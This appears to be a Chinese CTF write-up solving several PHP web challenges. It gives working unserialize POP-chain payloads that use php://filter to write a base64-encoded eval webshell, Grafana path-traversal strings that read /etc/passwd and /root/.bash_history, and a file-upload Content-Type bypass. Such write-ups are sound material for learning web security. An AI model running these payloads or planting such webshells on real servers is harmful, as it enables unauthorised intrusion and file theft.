WEB
POP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
| <?php
class catf1ag1{
public $hzy;
public $arr;
function show(){
show_source(__FILE__);
}
function __wakeup(){
foreach($this->arr as $k => $v){
echo $this->hzy->$v;
echo "</br>hzy是社么鬼???";
}
}
}
class catf1ag2{
public $file;
public $txt = '';
function __get($key){
if($key == 'pputut'){
return $this->pputut();
}else{
return '<p>'.htmlspecialchars($key).'</p>';
}
}
function pputut(){
if( strpos($this->file,'../') !== false ||
strpos($this->file,'\\') !== false
) die();
$content = '<?php die(\'stupid\'); ?>';
echo "NICE!!!,来自wsy赠送的小红花</br>";
$content .= $this->txt;
file_put_contents($this->file, $content);
return htmlspecialchars($content);
}
}
if(!empty($_POST)){
$hzy = base64_decode($_POST['giao']);
$instance = unserialize($hzy);
}else{
$a = new catf1ag1();
$a->show();
}
|
参考p牛的谈一谈php://filter的妙用
利用base64在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有”phpdiestupid”和我们传入的其他字符。
因为phpdiestupid刚好12个字符,所以不用再给他凑字符
poc:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| <?php
class catf1ag1{
public $hzy;
public $arr;
function __construct(){
$this->hzy=new catf1ag2();
$this->arr=array('pputut');
}
}
class catf1ag2
{
public $file;
public $txt;
function __construct(){
$this->file='php://filter/write=convert.base64-decode/resource=shell.php';
$this->txt='PD9waHAgZXZhbCAoJF9QT1NUWzFdKTs/Pg==';
}
}
echo base64_encode(serialize(new catf1ag1()));
|
然后连接shell.php的木马
ezlogin
跟上面一样的考点
扫出imdex.php,根据题目使用一次16进制,两次base64编码去包含source.php得到源码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
| <?php
error_reporting(0);
highlight_file(__FILE__);
class A{
public $hello;
public function __construct(){
$this->hello = new C;
}
public function __toString(){
if (isset($this->hello)){
return $this->hello->world();
}else{
return "Are you ok? Small dog";
}
}
}
class B{
public $file;
public $text;
public function __construct($file='',$text='') {
$this -> file = $file;
$this -> text = $text;
}
public function world(){
$d = '<?php die("886");?>';
$a= $d. $this->text;
file_put_contents($this-> file,$a);
}
}
class C{
public function world(){
return "Hello,world!";
}
}
$cmd=$_GET['cmd'];
if(isset($cmd)){
echo $IO = unserialize($cmd);
}
else{
echo "where is your chain?";
}
?> where is your chain?
|
因为phpdie886只有9个字符,所以要给他加3个字符,凑成4的整数倍
payload:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| <?php
error_reporting(0);
highlight_file(__FILE__);
class A{
public $hello;
public function __construct(){
$this->hello = new B;
}
}
class B{
public $file;
public $text;
public function __construct() {
$this -> file = 'php://filter/write=convert.base64-decode/resource=shell.php';
$this -> text = 'aaaPD9waHAgZXZhbCAoJF9QT1NUWzFdKTs/Pg==';
}
}
echo serialize(new A);
|
然后连接/surprise/shell.php的一句话木马
history
题目描述:
hacker入侵服务器之后没有做好痕迹清理,你能找到hacker的痕迹吗
利用以下poc来任意文件读取
1
| /public/plugins/alertlist/#/../../../../../../../../../../../etc/passwd
|
然后根据提示来查看.bash_history文件
1
| /public/plugins/alertlist/#/../../../../../../../../../../../root/.bash_history
|
发现了flag
然后读取flag,这里flag的名字为f1ag
1
| /public/plugins/alertlist/#/../../../../../../../../../../../home/grafana/f1ag
|
fileupload
如果直接传的话,后端会自动在文件名前加上*****,没有爆破出来,但是将Content-Type: 改为application/octet-stream后上传的时候就不会加上上面的前缀
不能传php结尾的,要传.jpg结尾的,不然没有权限访问,但是题目环境居然可以解析这个jpg文件(?
然后在uploads/1.jpg得到flag
